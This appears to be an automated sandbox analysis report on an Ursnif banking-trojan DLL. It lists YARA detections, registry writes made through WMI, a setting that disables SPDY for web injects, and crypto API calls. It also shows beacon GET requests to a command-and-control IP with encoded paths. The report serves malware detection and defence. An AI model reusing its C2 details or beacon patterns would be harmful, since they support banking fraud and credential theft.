            Source: global trafficHTTP traffic detected: GET /drew/rBML1rj8uElJfatm/1XUPHcYedh6XQNG/RfzcEZujO75haDUuMp/MBSLanUya/vTUM6CjwjVB_2F1X1CjS/LV0aTkXgDCKfXT831Mw/iqWmLrFI0W1nnldmY0nQOm/5tR5VYVCXmkqO/7H59YBEK/Qx8N4StPVj2TG0lcxpPmDMJ/os_2F27yzy/K94E3NnjB3SOalL_2/B5phCQkfkmoU/vGkUfmn2z2D/bI_2FkP7bk5mb4/JjP_2B8QttRH66r/R92.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR
            Source: loaddll32.exe, 00000001.00000002.511144160.00000000012DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR
            Disables SPDY (HTTP compression, likely to perform web injects)
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C178F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_01C178F2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F78F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_031F78F2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_010578F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,5_2_010578F2

            System Summary

            barindex
            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: 61f113091fd0c.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: 00000001.00000002.511490355.000000000134C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C14BB31_2_01C14BB3
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C1436E1_2_01C1436E
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C180D01_2_01C180D0
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0DF91_2_00DC0DF9
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0DF71_2_00DC0DF7
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DF4D01_2_046DF4D0
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D2CB81_2_046D2CB8
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E0CB21_2_046E0CB2
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C68B21_2_046C68B2
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C2D251_2_046C2D25
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E1DEA1_2_046E1DEA
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E01A51_2_046E01A5
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CF6411_2_046CF641
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F436E3_2_031F436E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F4BB33_2_031F4BB3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F80D03_2_031F80D0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD2CB83_2_04BD2CB8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE0CB23_2_04BE0CB2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDF4D03_2_04BDF4D0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE14183_2_04BE1418
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE1D923_2_04BE1D92
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE1DEA3_2_04BE1DEA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC2D253_2_04BC2D25
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCF6413_2_04BCF641
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC68B23_2_04BC68B2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE01A53_2_04BE01A5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD39243_2_04BD3924
